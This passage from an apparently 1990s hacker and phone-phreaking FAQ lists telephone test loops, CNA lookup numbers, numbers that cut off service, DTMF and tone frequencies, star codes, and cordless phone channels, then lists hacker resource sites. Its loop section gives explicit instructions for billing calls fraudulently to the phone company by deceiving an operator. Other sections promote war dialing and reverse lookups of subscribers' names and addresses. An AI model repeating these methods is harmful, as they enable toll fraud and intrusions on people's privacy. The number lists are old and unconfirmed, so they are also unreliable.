  3276. 719  99x-xxxx         Colorado Springs/Leadville/Pueblo, CO
  3277. 801  938-xxxx         Utah (All)
  3278. 801  939-xxxx         Utah (All)
  3279. 804  260              Charlottesville/Newport News/Norfolk/Richmond, VA
  3280. 805  114              Bakersfield/Santa Barbara, CA
  3281. 805  980-xxxx         Bakersfield/Santa Barbara, CA
  3282. 810  951-xxx-xxxx     Pontiac/Southfield/Troy, MI
  3283. 813  711              Ft. Meyers/St. Petersburg/Tampa, FL
  3284. 817  971              Ft. Worth/Waco, TX  (Press 2#)
  3285. 906  951-xxx-xxxx     Marquette/Sault Ste. Marie, MI
  3286. 908  55?-xxxx         New Brunswick, NJ
  3287. 908  953              New Brunswick, NJ
  3288. 914  660-xxxx         Peekskill/Poughkeepsie/White Plains/Yonkers, NY
  3289.  
  3290. Canada:
  3291. 416  57x-xxxx         Toronto, Ontario
  3292. 416  99x-xxxx         Toronto, Ontario
  3293. 416  999-xxx-xxxx     Toronto, Ontario
  3294. 514  320-xxx-xxxx     Montreal, Quebec
  3295. 613  999-xxx-xxxx     Ottawa, Ontario
  3296. 705  999-xxx-xxxx     North Bay/Saulte Ste. Marie, Ontario
  3297.  
  3298. Australia: +61 199
  3299. Brazil: 199
  3300. New Zealand: 137
  3301. Sweden: 0058
  3302. United Kingdom: 174 or 1744 or 175
  3303.  
  3304.  
  3305. 14. What is a loop?
  3306.  
  3307. This FAQ answer is excerpted from: ToneLoc v0.99 User Manual
  3308.                                    by Minor Threat & Mucho Maas
  3309.  
  3310. Loops are a pair of phone numbers, usually consecutive, like 836-9998
  3311. and 836-9999.  They are used by the phone company for testing.  What
  3312. good do loops do us?  Well, they are cool in a few ways.  Here is a
  3313. simple use of loops.  Each loop has two ends, a 'high' end, and a
  3314. 'low' end.  One end gives a (usually) constant, loud tone when it is
  3315. called. The other end is silent.  Loops don't usually ring either.
  3316. When BOTH ends are called, the people that called each end can talk
  3317. through the loop.  Some loops are voice filtered and won't pass
  3318. anything but a constant tone; these aren't much use to you.  Here's
  3319. what you can use working loops for:  billing phone calls!  First, call
  3320. the end that gives the loud tone.  Then if the operator or someone
  3321. calls the other end, the tone will go quiet.  Act like the phone just
  3322. rang and you answered it ... say "Hello", "Allo", "Chow", "Yo", or
  3323. what the fuck ever.  The operator thinks that she just called you, and
  3324. that's it!  Now the phone bill will go to the loop, and your local
  3325. RBOC will get the bill!  Use this technique in moderation, or the loop
  3326. may go down.  Loops are probably most useful when you want to talk to
  3327. someone to whom you don't want to give your phone number.
  3328.  
  3329.  
  3330. 15. What is a loop in my area?
  3331.  
  3332. Many of these loops are no longer functional.  If you are local
  3333. to any of these loops, please try them out an e-mail me the results
  3334. of your research.
  3335.  
  3336. NPA    High      Low
  3337. ---  --------  --------
  3338. 201  228-9929  228-9930
  3339. 201  238-9929  238-9930
  3340. 201  251-9929  251-9930
  3341. 201  254-9929  254-9930
  3342. 201  272-9929  272-9930
  3343. 201  330-9929  330-9930
  3344. 201  333-9929  333-9930
  3345. 201  339-9929  339-9930
  3346. 201  347-9929  347-9930
  3347. 201  376-9929  376-9930
  3348. 201  398-9929  398-9930
  3349. 201  467-9929  467-9930
  3350. 201  528-9929  528-9930
  3351. 201  531-9929  531-9930
  3352. 201  558-9929  558-9930
  3353. 201  559-9929  559-9930
  3354. 201  560-9929  560-9930
  3355. 201  592-9929  592-9930
  3356. 201  625-9929  625-9930
  3357. 201  631-9929  631-9930
  3358. 201  637-9929  637-9930
  3359. 201  655-9929  655-9930
  3360. 201  666-9929  666-9930
  3361. 201  690-9929  690-9930
  3362. 201  761-9929  761-9930
  3363. 201  762-9929  762-9929
  3364. 201  762-9929  762-9930
  3365. 201  763-9929  763-9930
  3366. 201  764-9929  764-9930
  3367. 201  767-9929  767-9930
  3368. 201  768-9929  768-9930
  3369. 201  773-9929  773-9930
  3370. 201  879-9929  879-9930
  3371. 201  938-9929  938-9930
  3372. 201  946-9929  946-9930
  3373. 201  992-9929  992-9930
  3374. 201  993-9929  993-9930
  3375. 201  994-9929  994-9930
  3376. 206  827-0018  827-0019
  3377. 206  988-0020  988-0022
  3378. 208  862-9996  862-9997
  3379. 209  732-0044  732-0045
  3380. 212  220-9977  220-9979
  3381. 212  283-9977  283-9979
  3382. 212  283-9977  283-9997
  3383. 212  352-9900  352-9906
  3384. 212  365-9977  365-9979
  3385. 212  529-9900  529-9906
  3386. 212  562-9977  562-9979
  3387. 212  986-9977  986-9979
  3388. 213  360-1118  360-1119
  3389. 213  365-1118  365-1119
  3390. 213  455-0002  455-XXXX
  3391. 213  455-0002  455-xxxx
  3392. 213  546-0002  546-XXXX
  3393. 213  546-0002  546-xxxx
  3394. 213  549-1118  549-1119
  3395. 214  291-4759  291-4757
  3396. 214  299-4759  299-4757
  3397. 305  778-9952  778-9951
  3398. 305  964-9951  964-9952
  3399. 307  468-9999  468-9998
  3400. 308  357-0004  357-0005
  3401. 312  222-9973  222-9974
  3402. 312  234-9973  234-9974
  3403. 313  224-9996  224-9997
  3404. 313  225-9996  225-9997
  3405. 313  234-9996  234-9997
  3406. 313  237-9996  237-9997
  3407. 313  256-9996  256-9997
  3408. 313  272-9996  272-9997
  3409. 313  273-9996  273-9997
  3410. 313  277-9996  277-9997
  3411. 313  281-9996  281-9997
  3412. 313  292-9996  292-9997
  3413. 313  299-9996  299-9997
  3414. 313  321-9996  321-9997
  3415. 313  326-9996  326-9997
  3416. 313  356-9996  356-9997
  3417. 313  362-9996  362-9997
  3418. 313  369-9996  369-9997
  3419. 313  388-9996  388-9997
  3420. 313  397-9996  397-9997
  3421. 313  399-9996  399-9997
  3422. 313  445-9996  445-9997
  3423. 313  465-9996  465-9997
  3424. 313  471-9996  471-9997
  3425. 313  474-9996  474-9997
  3426. 313  477-9996  477-9997
  3427. 313  478-9996  478-9997
  3428. 313  483-9996  483-9997
  3429. 313  497-9996  497-9997
  3430. 313  526-9996  526-9997
  3431. 313  552-9996  552-9997
  3432. 313  556-9996  556-9997
  3433. 313  561-9996  561-9997
  3434. 313  569-9996  569-9996
  3435. 313  575-9996  575-9997
  3436. 313  577-9996  577-9997
  3437. 313  585-9996  585-9997
  3438. 313  591-9996  591-9997
  3439. 313  621-9996  621-9997
  3440. 313  626-9996  626-9997
  3441. 313  644-9996  644-9997
  3442. 313  646-9996  646-9997
  3443. 313  647-9996  647-9997
  3444. 313  649-9996  649-9997
  3445. 313  663-9996  663-9997
  3446. 313  665-9996  665-9997
  3447. 313  683-9996  683-9997
  3448. 313  721-9996  721-9997
  3449. 313  722-9996  722-9997
  3450. 313  728-9996  728-9997
  3451. 313  731-9996  731-9997
  3452. 313  751-9996  751-9997
  3453. 313  776-9996  776-9997
  3454. 313  781-9996  781-9997
  3455. 313  787-9996  787-9997
  3456. 313  822-9996  822-9997
  3457. 313  833-9996  833-9997
  3458. 313  851-9996  851-9997
  3459. 313  871-9996  871-9997
  3460. 313  875-9996  875-9997
  3461. 313  886-9996  886-9997
  3462. 313  888-9996  888-9997
  3463. 313  898-9996  898-9997
  3464. 313  934-9996  934-9997
  3465. 313  942-9996  942-9997
  3466. 313  963-9996  963-9997
  3467. 313  977-9996  977-9997
  3468. 315  673-9995  673-9996
  3469. 315  695-9995  695-9996
  3470. 402  422-0001  422-0002
  3471. 402  422-0003  422-0004
  3472. 402  422-0005  422-0006
  3473. 402  422-0007  422-0008
  3474. 402  572-0003  572-0004
  3475. 402  779-0004  779-0007
  3476. 406  225-9902  225-9903
  3477. 517  422-9996  422-9997
  3478. 517  423-9996  423-9997
  3479. 517  455-9996  455-9997
  3480. 517  563-9996  563-9997
  3481. 517  663-9996  663-9997
  3482. 517  851-9996  851-9997
  3483. 609  921-9929  921-9930
  3484. 609  994-9929  994-9930
  3485. 616  997-9996  997-9997
  3486. 713  224-1499  759-1799
  3487. 713  324-1499  324-1799
  3488. 713  342-1499  342-1799
  3489. 713  351-1499  351-1799
  3490. 713  354-1499  354-1799
  3491. 713  356-1499  356-1799
  3492. 713  442-1499  442-1799
  3493. 713  447-1499  447-1799
  3494. 713  455-1499  455-1799
  3495. 713  458-1499  458-1799
  3496. 713  462-1499  462-1799
  3497. 713  466-1499  466-1799
  3498. 713  468-1499  468-1799
  3499. 713  469-1499  469-1799
  3500. 713  471-1499  471-1799
  3501. 713  481-1499  481-1799
  3502. 713  482-1499  482-1799
  3503. 713  484-1499  484-1799
  3504. 713  487-1499  487-1799
  3505. 713  489-1499  489-1799
  3506. 713  492-1499  492-1799
  3507. 713  493-1499  493-1799
  3508. 713  524-1499  524-1799
  3509. 713  526-1499  526-1799
  3510. 713  555-1499  555-1799
  3511. 713  661-1499  661-1799
  3512. 713  664-1499  664-1799
  3513. 713  665-1499  665-1799
  3514. 713  666-1499  666-1799
  3515. 713  667-1499  667-1799
  3516. 713  682-1499  976-1799
  3517. 713  771-1499  771-1799
  3518. 713  780-1499  780-1799
  3519. 713  781-1499  997-1799
  3520. 713  960-1499  960-1799
  3521. 713  977-1499  977-1799
  3522. 713  988-1499  988-1799
  3523. 805  528-0044  528-0045
  3524. 805  544-0044  544-0045
  3525. 805  773-0044  773-0045
  3526. 808  235-9907  235-9908
  3527. 808  239-9907  239-9908
  3528. 808  245-9907  245-9908
  3529. 808  247-9907  247-9908
  3530. 808  261-9907  261-9908
  3531. 808  322-9907  322-9908
  3532. 808  328-9907  328-9908
  3533. 808  329-9907  329-9908
  3534. 808  332-9907  332-9908
  3535. 808  335-9907  335-9908
  3536. 808  572-9907  572-9908
  3537. 808  623-9907  623-9908
  3538. 808  624-9907  624-9908
  3539. 808  668-9907  668-9908
  3540. 808  742-9907  742-9908
  3541. 808  879-9907  879-9908
  3542. 808  882-9907  882-9908
  3543. 808  885-9907  885-9908
  3544. 808  959-9907  959-9908
  3545. 808  961-9907  961-9908
  3546. 813  385-9971
  3547. 908  776-9930  776-9930
  3548.  
  3549.  
  3550. 16. What is a CNA number?
  3551.  
  3552. CNA stands for Customer Name and Address.  The CNA number is a phone
  3553. number for telephone company personnel to call and get the name and
  3554. address for a phone number.  If a telephone lineman finds a phone line
  3555. he does not recognize, he can use the ANI number to find it's phone
  3556. number and then call the CNA operator to see who owns it and where
  3557. they live.
  3558.  
  3559. Normal CNA numbers are available only to telephone company personnel.
  3560. Private citizens may legally get CNA information from private
  3561. companies.  Two such companies are:
  3562.  
  3563. Unidirectory    (900)933-3330
  3564. Telename        (900)884-1212
  3565.  
  3566. Note that these are 900 numbers, and will cost you approximately one
  3567. dollar per minute.
  3568.  
  3569. If you are in 312 or 708, AmeriTech has a pay-for-play CNA service
  3570. available to the general public.  The number is 796-9600.  The cost is
  3571. $.35/call and can look up two numbers per call.
  3572.  
  3573. An interesting number is The House of Windsor Collection at
  3574. (800)433-3210.  If you dial it and press 1 to request a catalog, it
  3575. will ask for your telephone number.  If will then tell you the street
  3576. name of any telephone number you enter.
  3577.  
  3578.  
  3579. 17. What is the telephone company CNA number for my area?
  3580.  
  3581. 203  203-771-8080     CT (All)
  3582. 516  516-321-5700     Hempstead/Long Island, NY
  3583. 614  614-464-0123     Columbus/Steubenville, OH
  3584. 813  813-270-8711     Ft. Meyers/St. Petersburg/Tampa, FL
  3585. 513  513-397-9110     Cincinnati/Dayton, OH
  3586.  
  3587.  
  3588. 18. What are some numbers that always ring busy?
  3589.  
  3590. 216  xxx-9887              Akron/Canton/Cleveland/Lorain/Youngstown, OH
  3591. 316  952-7265              Dodge City/Wichita, KS
  3592. 501  377-99xx              AR (All)
  3593. 719  472-3773              Colorado Springs/Leadville/Pueblo, CO
  3594. 719  577-6100 to 577-6200  Colorado Springs/Leadville/Pueblo, CO
  3595. 818  885-0699              Pasadena, CA
  3596. 906  632-9999              Marquette/Sault Ste. Marie, MI
  3597. 906  635-9999              Marquette/Sault Ste. Marie, MI
  3598. 914  576-9903              Peekskill/Poughkeepsie/White Plains/Yonkers, NY
  3599.  
  3600.  
  3601. 19. What are some numbers that temporarily disconnect phone service?
  3602.  
  3603. 314  511        Columbia/Jefferson City/St.Louis, MO (1 minute)
  3604. 404  420        Atlanta, GA                          (5 minutes)
  3605. 405  953        Enid/Oklahoma City, OK               (1 minute)
  3606. 407  511        Orlando/West Palm Beach, FL          (1 minute)
  3607. 512  200        Austin/Corpus Christi, TX            (1 minute)
  3608. 516  480        Hempstead/Long Island, NY            (1 minute)
  3609. 603  980        NH (All)
  3610. 512  200        Austin/Corpus Christi, TX            (1 minute)
  3611. 919  211 or 511 Durham, NC                           (10 min - 1 hour)
  3612.  
  3613.  
  3614. 20. What is scanning?
  3615.  
  3616. Scanning is dialing a large number of telephone numbers in the hope
  3617. of finding interesting carriers (computers) or tones.
  3618.  
  3619. Scanning can be done by hand, although dialing several thousand
  3620. telephone numbers by hand is extremely boring and takes a long time.
  3621.  
  3622. Much better is to use a scanning program, sometimes called a war
  3623. dialer or a demon dialer.  Currently, the best war dialer available
  3624. to PC-DOS users is ToneLoc from Minor Threat and Mucho Maas.
  3625.  
  3626. A war dialer will dial a range of numbers and log what it finds at
  3627. each number.  You can then only dial up the numbers that the war
  3628. dialer marked as carriers or tones.
  3629.  
  3630.  
  3631. 21. Is scanning illegal?
  3632.  
  3633. Excerpt from: 2600, Spring 1990, Page 27:
  3634.  
  3635. -BQ-
  3636. In some places, scanning has been made illegal.  It would be hard,
  3637. though, for someone to file a complaint against you for scanning since
  3638. the whole purpose is to call every number once and only once.  It's
  3639. not likely to be thought of as harassment by anyone who gets a single
  3640. phone call from a scanning computer.  Some central offices have been
  3641. known to react strangely when people start scanning.  Sometimes you're
  3642. unable to get a dialtone for hours after you start scanning.  But
  3643. there is no uniform policy.  The best thing to do is to first find out
  3644. if you've got some crazy law saying you can't do it.  If, as is
  3645. likely, there is no such law, the only way to find out what happens is
  3646. to give it a try.
  3647. -EQ-
  3648.  
  3649. It should be noted that a law making scanning illegal was recently
  3650. passed in Colorado Springs, CO.  It is now illegal to place a call
  3651. in Colorado Springs without the intent to communicate.
  3652.  
  3653.  
  3654. 22. Where can I purchase a lineman's handset?
  3655.  
  3656. Contact East
  3657. 335 Willow Street
  3658. North Andover, MA 01845-5995
  3659. (508)682-2000
  3660.  
  3661. Jensen Tools
  3662. 7815 S. 46th Street
  3663. Phoenix, AZ 85044-5399
  3664.  
  3665. Time Motion Tools
  3666. 12778 Brookprinter Place
  3667. Poway, CA 92064
  3668. (619)679-0303
  3669.  
  3670.  
  3671. 23. What are the DTMF frequencies?
  3672.  
  3673. DTMF stands for Dual Tone Multi Frequency.  These are the tones you
  3674. get when you press a key on your telephone touchpad.  The tone of the
  3675. button is the sum of the column and row tones.  The ABCD keys do not
  3676. exist on standard telephones.
  3677.  
  3678.          1209 1336 1477 1633
  3679.  
  3680.      697   1    2    3    A
  3681.  
  3682.      770   4    5    6    B
  3683.  
  3684.      852   7    8    9    C
  3685.  
  3686.      941   *    0    #    D
  3687.  
  3688.  
  3689. 24. What are the frequencies of the telephone tones?
  3690.  
  3691. Type                Hz          On      Off
  3692. ---------------------------------------------------------------------
  3693. Dial Tone         350 & 400     ---     ---
  3694. Busy Signal       480 & 620     0.5     0.5
  3695. Toll Congestion   480 & 620     0.2     0.3
  3696. Ringback (Normal) 440 & 480     2.0     4.0
  3697. Ringback (PBX)    440 & 480     1.5     4.5
  3698. Reorder (Local)   480 & 620     3.0     2.0
  3699. Invalid Number    200 & 400
  3700. Hang Up Warning 1400 & 2060     0.1     0.1
  3701. Hang Up         2450 & 2600     ---     ---
  3702.  
  3703.  
  3704. 25. What are all of the * codes?
  3705.  
  3706. Local Area Signalling Services (LASS) and Custom Calling Feature
  3707. Control Codes:
  3708.  
  3709. (These appear to be standard, but may be changed locally)
  3710.  
  3711. Service                     Tone    Pulse/rotary   Notes
  3712. --------------------------------------------------------------------------
  3713. Assistance/Police           *12         n/a        [1]
  3714. Cancel forwarding           *30         n/a        [C1]
  3715. Automatic Forwarding        *31         n/a        [C1]
  3716. Notify                      *32         n/a        [C1] [2]
  3717. Intercom Ring 1 (..)        *51         1151       [3]
  3718. Intercom Ring 2 (.._)       *52         1152       [3]
  3719. Intercom Ring 3 (._.)       *53         1153       [3]
  3720. Extension Hold              *54         1154       [3]
  3721. Customer Originated Trace   *57         1157
  3722. Selective Call Rejection    *60         1160       (or Call Screen)
  3723. Selective Distinct Alert    *61         1161
  3724. Selective Call Acceptance   *62         1162
  3725. Selective Call Forwarding   *63         1163
  3726. ICLID Activation            *65         1165
  3727. Call Return (outgoing)      *66         1166
  3728. Number Display Blocking     *67         1167       [4]
  3729. Computer Access Restriction *68         1168
  3730. Call Return (incoming)      *69         1169
  3731. Call Waiting disable        *70         1170       [4]
  3732. No Answer Call Transfer     *71         1171
  3733. Usage Sensitive 3 way call  *71         1171
  3734. Call Forwarding: start      *72 or 72#  1172
  3735. Call Forwarding: cancel     *73 or 73#  1173
  3736. Speed Calling (8 numbers)   *74 or 74#  1174
  3737. Speed Calling (30 numbers)  *75 or 75#  1175
  3738. Anonymous Call Rejection    *77         1177       [5] [M: *58]
  3739. Call Screen Disable         *80         1160       (or Call Screen) [M: *50]
  3740. Selective Distinct Disable  *81         1161       [M: *51]
  3741. Select. Acceptance Disable  *82         1162
  3742. Select. Forwarding Disable  *83         1163       [M: *53]
  3743. ICLID Disable               *85         1165
  3744. Call Return (cancel out)    *86         1186       [6] [M: *56]
  3745. Anon. Call Reject (cancel)  *87         1187       [5] [M: *68]
  3746. Call Return (cancel in)     *89         1189       [6] [M: *59]
  3747.  
  3748. Notes:
  3749.  
  3750. [C1]     - Means code used for Cellular One service
  3751. [1]      - for cellular in Pittsburgh, PA A/C 412 in some areas
  3752. [2]      - indicates that you are not local and maybe how to reach you
  3753. [3]      - found in Pac Bell territory; Intercom ring causes a distinctive
  3754.            ring to be generated on the current line; Hold keeps a call
  3755.            connected until another extension is picked up
  3756. [4]      - applied once before each call
  3757. [5]      - A.C.R. blocks calls from those who blocked Caller ID
  3758.            (used in C&P territory, for instance)
  3759. [6]      - cancels further return attempts
  3760. [M: *xx] - alternate code used for MLVP (multi-line variety package)
  3761.            by Bellcore. It goes by different names in different RBOCs.
  3762.            In Bellsouth it is called Prestige. It is an arrangement of
  3763.            ESSEX like features for single or small multiple line groups.
  3764.  
  3765.            The reason for different codes for some features in MLVP is that
  3766.            call-pickup is *8 in MLVP so all *8x codes are reaasigned *5x
  3767.  
  3768.  
  3769. 26. What frequencies do cordless phones operate on?
  3770.  
  3771. Here are the frequencies for the first generation 46/49mhz phones.
  3772. The new 900mhz cordless phones are not covered.
  3773.  
  3774. Channel    Handset Transmit    Base Transmit
  3775. -------    ----------------    -------------
  3776.    1          49.670mhz          46.610mhz
  3777.    2          49.845             46.630
  3778.    3          49.860             46.670
  3779.    4          49.770             46.710
  3780.    5          49.875             46.730
  3781.    6          49.830             46.770
  3782.    7          49.890             46.830
  3783.    8          49.930             46.870
  3784.    9          49.990             46.930
  3785.   10          49.970             46.970
  3786.  
  3787.  
  3788.  
  3789.  
  3790. Section C: Resources
  3791. ~~~~~~~~~~~~~~~~~~~~
  3792.  
  3793. 01. What are some ftp sites of interest to hackers?
  3794.  
  3795. alex.sp.cs.cmu.edu      /links/security                 (Misc)
  3796. aql.gatech.edu                                          (40Hex)
  3797. athena-dist.mit.edu     /pub/ATHENA                     (Athena Project)
  3798. bellcore.com                                            (Bellcore)
  3799. camelot.usc.edu         /pub/cellular/DDIinfodemo       (Cellular)
  3800. cert.org                                                (CERT)
  3801. coast.cs.purdue.edu     /pub                            (Security)
  3802. coast.cs.purdue.edu     /pub                            (Coast)
  3803. cs.columbia.edu         /archives/mirror2/world-info/obi/Phracks
  3804. crimelab.com                                            (Crimelab)
  3805. dartmouth.edu           /pub/security                   (Security)
  3806. fc.net                  /pub/defcon                     (DefCon)
  3807. freeside.com                                            (Phrack)
  3808. lod.amaranth.com                                        (Legion of Doom)
  3809. ftp.apple.com           /pub/stud_reps/phrack           (Zines)
  3810. ftp.3com.com            /Orange-Book                    (Orange Book)
  3811. ftp.3com.com            /mirrors/zip                    (ZipCrypt)
  3812. ftp.IEunet.ie           /pub/security                   (Security)
  3813. ftp.armory.com          /pub/user/kmartind              (H/P)
  3814. ftp.cert.org            /pub                            (CERT)
  3815. ftp.cic.net             /pub/e-serials/alphabetic/p/phrack (Zines)
  3816. ftp.clark.net           /pub/jcase                      (H/P)
  3817. ftp.commerce.net        /pubs/standards/drafts/shttp.txt(Secure HyperText)
  3818. ftp.cs.uwm.edu          /pub/comp-privacy               (Comp. Privacy Digest)
  3819. ftp.csl.sri.com         /pub/nides                      (SRI)
  3820. ftp.csua.berkeley.edu   /pub/cypherpunks                (Crypto)
  3821. ftp.eff.org             /pub/cud                        (EFF)
  3822. ftp.elelab.nsc.co.jp    /pub/security                   (Security)
  3823. ftp.etext.org                                           (Etext)
  3824. ftp.fc.net
  3825. ftp.fh-berlin.de                                        (Wordlists)
  3826. ftp.greatcircle.com     /pub/firewalls                  (Firewalls)
  3827. ftp.halcyon.com         /pub/cud                        (Zines)
  3828. ftp.inoc.dl.nec.com     /pub/security                   (Security)
  3829. ftp.mcs.com             /mcsnet.users/crisadm/stuff/research/samples (Virii)
  3830. ftp.near.net            /security/archives/phrack       (Zines)
  3831. ftp.netcom.com          /pub/br/bradleym                (Virii)
  3832. ftp.netcom.com          /pub/va/vandal                  (DnA)
  3833. ftp.netcom.com          /pub/vo/vortex                  (Phiber-Scream)
  3834. ftp.netcom.com          /pub/zz/zzyzx                   (H/P)
  3835. ftp.ocs.mq.edu.au       /PC/Crypt                       (Crypto)
  3836. ftp.paranoia.com        /pub/toneloc/tl110.zip          (ToneLoc)
  3837. ftp.primus.com          /pub/armchair                   (Phoney)
  3838. ftp.primus.com          /pub/security                   (Security)
  3839. ftp.rahul.net           /pub/lps                        (Home of the FAQ)
  3840. ftp.std.com             /archives/alt.locksmithing      (Locksmithing)
  3841. ftp.std.com             /obi/Mischief/                  (MIT Guide to Lock...)
  3842. ftp.std.com             /obi/Phracks                    (Zines)
  3843. ftp.sunet.se            /pub/network/monitoring         (Ethernet sniffers)
  3844. ftp.sura.net            /pub/security                   (SURAnet)
  3845. ftp.tis.com             /pub                            (TIS)
  3846. ftp.uu.net              /doc/literary/obi/Phracks       (Zines)
  3847. ftp.warwick.ac.uk       /pub/cud                        (Zines)
  3848. ftp.win.tue.nl          /pub/security                   (Security)
  3849. ftp.winternet.com       /users/craigb                   (H/P)
  3850. ftp.wustl.edu           /doc/EFF                        (EFF)
  3851. furmint.nectar.cs.cmu.edu /security                     (Crypto)
  3852. garbo.uwasa.fi          /pc/crypt                       (Crypto)
  3853. irbis.llnl.gov          /pub                            (CIAC)
  3854. lcs.mit.edu             /telecom-archives               (Telecom archives)
  3855. mary.iia.org            /pub/users/patriot              (Misc)
  3856. net.tamu.edu            /pub/security/TAMU              (Security)
  3857. net23.com               /pub                            (Max Headroom)
  3858. nic.ddn.mil             /scc                            (DDN Security)
  3859. nic.funet.fi            /pub/doc/cud                    (Zines)
  3860. paradox1.denver.colorado.edu  /anonymous/text-files/pyrotechnics (Pyro)
  3861. pyrite.rutgers.edu      /pub/security                   (Security)
  3862. relay.cs.toronto.edu    /doc/telecom-archives           (Telecom)
  3863. rena.dit.co.jp          /pub/security                   (Security)
  3864. research.att.com        /dist/internet_security         (AT&T)
  3865. ripem.msu.edu           /pub/crypt                      (Ripem)
  3866. rs1.rrz.uni-koeln.de                                    (Wordlists)
  3867. rtfm.mit.edu                                            (Etext)
  3868. rtfm.mit.edu            /pub/usenet-by-group            (Usenet FAQ's)
  3869. sable.ox.ac.uk                                          (Wordlists)
  3870. scss3.cl.msu.edu        /pub/crypt                      (Crypto)
  3871. sekurity.com                                            (TNO)
  3872. spy.org                                                 (CSC)
  3873. suburbia.apana.org.au   /pub/unix/security              (Security)
  3874. theta.iis.u-tokyo.ac.jp /pub1/security                  (Security)
  3875. titania.mathematik.uni-ulm.de /pub/security             (Security)
  3876. uceng.uc.edu            /pub/kerberos.documentation     (Kerberos)
  3877. wimsey.bc.ca            /pub/crypto                     (Crypto)
  3878.  
  3879.  
  3880. 02. What are some newsgroups of interest to hackers?
  3881.  
  3882. alt.2600                Do it 'til it hertz
  3883. alt.2600.hope.tech      Technology concerns for Hackers on Planet Earth 1994
  3884. alt.cellular
  3885. alt.cyberpunk           High-tech low-life.
  3886. alt.cyberspace          Cyberspace and how it should work.
  3887. alt.dcom.telecom        Discussion of telecommunications technology
  3888. alt.engr.explosives     [no description available]
  3889. alt.hackers             Descriptions of projects currently under development
  3890. alt.locksmithing        You locked your keys in *where*?
  3891. alt.hackers.malicious   The really bad guys - don't take candy from them
  3892. alt.privacy.anon-server Technical & policy matters of anonymous contact servers
  3893. alt.radio.pirate        Hide the gear, here comes the magic station-wagons.
  3894. alt.radio.scanner       Discussion of scanning radio receivers.
  3895. alt.security            Security issues on computer systems
  3896. alt.security.index      Pointers to good stuff in misc.security (Moderated)
  3897. alt.security.keydist    Exchange of keys for public key encryption systems
  3898. alt.security.pgp        The Pretty Good Privacy package
  3899. alt.security.ripem      A secure email system illegal to export from the US
  3900. comp.dcom.cellular      [no description available]
  3901. comp.dcom.telecom       Telecommunications digest (Moderated)
  3902. comp.dcom.telecom.tech  [no description available]
  3903. comp.org.cpsr.announce  Computer Professionals for Social Responsibility
  3904. comp.org.cpsr.talk      Issues of computing and social responsibility
  3905. comp.org.eff.news       News from the Electronic Frontiers Foundation
  3906. comp.org.eff.talk       Discussion of EFF goals, strategies, etc.
  3907. comp.protocols.kerberos The Kerberos authentification server
  3908. comp.protocols.tcp-ip   TCP and IP network protocols
  3909. comp.risks              Risks to the public from computers & users
  3910. comp.security.announce  Announcements from the CERT about security
  3911. comp.security.misc      Security issues of computers and networks
  3912. comp.security.unix      Discussion of Unix security
  3913. comp.virus              Computer viruses & security (Moderated)
  3914. de.org.ccc              Mitteilungen des CCC e.V.
  3915. misc.security           Security in general, not just computers (Moderated)
  3916. rec.pyrotechnics        Fireworks, rocketry, safety, & other topics
  3917. rec.radio.scanner       [no description available]
  3918. rec.video.cable-tv      Technical and regulatory issues of cable television.
  3919. sci.crypt               Different methods of data en/decryption
  3920.  
  3921.  
  3922. 03. What are some telnet sites of interest to hackers?
  3923.  
  3924. ntiabbs.ntia.doc.gov            (NTIA)
  3925. telnet lust.isca.uiowa 2600     (underground bbs)
  3926.  
  3927.  
  3928. 04. What are some gopher sites of interest to hackers?
  3929.  
  3930. ba.com                  (Bell Atlantic)
  3931. csrc.ncsl.nist.gov      (NIST Security Gopher)
  3932. gopher.acm.org          (SIGSAC (Security, Audit & Control))
  3933. gopher.cpsr.org         (Computer Professionals for Social Responsibility)
  3934. gopher.cs.uwm.edu
  3935. gopher.eff.org          (Electonic Frontier Foundation)
  3936. gopher.wired.com        (Wired Magazine)
  3937. gw.PacBell.com          (Pacific Bell)
  3938. iitf.doc.gov            (NITA -- IITF)
  3939. oss.net                 (Open Source Solutions)
  3940. spy.org                 (Computer Systems Consulting)
  3941. wiretap.spies.com       (Wiretap)
  3942.  
  3943.  
  3944. 05. What are some World wide Web (WWW) sites of interest to hackers?
  3945.  
  3946. http://aset.rsoc.rockwell.com                   (NASA/MOD AIS Security)
  3947. http://aset.rsoc.rockwell.com/exhibit.html(Technology for Information Security)
  3948. http://ausg.dartmouth.edu/security.html         (Security)
  3949. http://crimelab.com/bugtraq/bugtraq.html        (Bugtraq)
  3950. http://cs.purdue.edu/coast/coast.html           (Coast)
  3951. http://csrc.ncsl.nist.gov                       (NIST)
  3952. http://dans.dorm.umd.edu/~deker
  3953. http://dfw.net/~aleph1
  3954. http://draco.centerline.com:8080/~franl/crypto.html (Crypto)
  3955. http://everest.cs.ucdavis.edu/Security.html     (Security)
  3956. http://everest.cs.ucdavis.edu/slides/slides.html(Security Lab Slides)
  3957. http://ezinfo.ethz.ch/ETH/D-REOK/fsk/fsk_homepage.html  (CSSCR)
  3958. http://first.org                                (FIRST)
  3959. http://ftp.tamu.edu/~abr8030/security.html      (Security)
  3960. http://hightop.nrl.navy.mil/potpourri.html      (Security)
  3961. http://hightop.nrl.navy.mil/rainbow.html        (Rainbow Books)
  3962. http://info.bellcore.com/BETSI/betsi.html       (Betsi)
  3963. http://infosec.nosc.mil/infosec.html            (SPAWAR INFOSEC)
  3964. http://l0pht.com                                (The l0pht)
  3965. http://mls.saic.com                             (SAIC MLS)
  3966. http://naic.nasa.gov/fbi/FBI_homepage.html      (FBI Homepage)
  3967. http://nasirc.hq.nasa.gov                       (NASA ASIRC)
  3968. http://ophie.hughes.american.edu/~ophie
  3969. http://tansu.com.au/Info/security.html          (Computer and Network Security)
  3970. http://the-tech.mit.edu                         (LaMacchia case info)
  3971. http://wintermute.itd.nrl.navy.mil/5544.html    (Network Security)
  3972. http://www.aads.net                             (Ameritech)
  3973. http://www.achilles.net/~pluvius
  3974. http://www.alw.nih.gov/WWW/security.html        (Unix Security)
  3975. http://www.artcom.de/CCC                        (CCC Homepage)
  3976. http://www.ba.com                               (Bell Atlantic)
  3977. http://www.beckman.uiuc.edu/groups/biss/VirtualLibrary/xsecurity.html(X-Win)
  3978. http://www.bell.com                             (MFJ Task Force)
  3979. http://www.bellcore.com/SECURITY/security.html  (Bellcore Security Products)
  3980. http://www.brad.ac.uk/~nasmith/index.html
  3981. http://www.bst.bls.com                          (BellSouth)
  3982. http://www.c3.lanl.gov/~mcn                     (Lanl)
  3983. http://www.commerce.net/information/standards/drafts/shttp.txt (HyperText)
  3984. http://www.contrib.andrew.cmu.edu:8001/usr/dscw/home.html
  3985. http://www.cpsr.org/home                        (CPSR)
  3986. http://www.cs.umd.edu/~lgas
  3987. http://www.cs.cmu.edu:8001/afs/cs.cmu.edu/user/bsy/www/sec.html (Security)
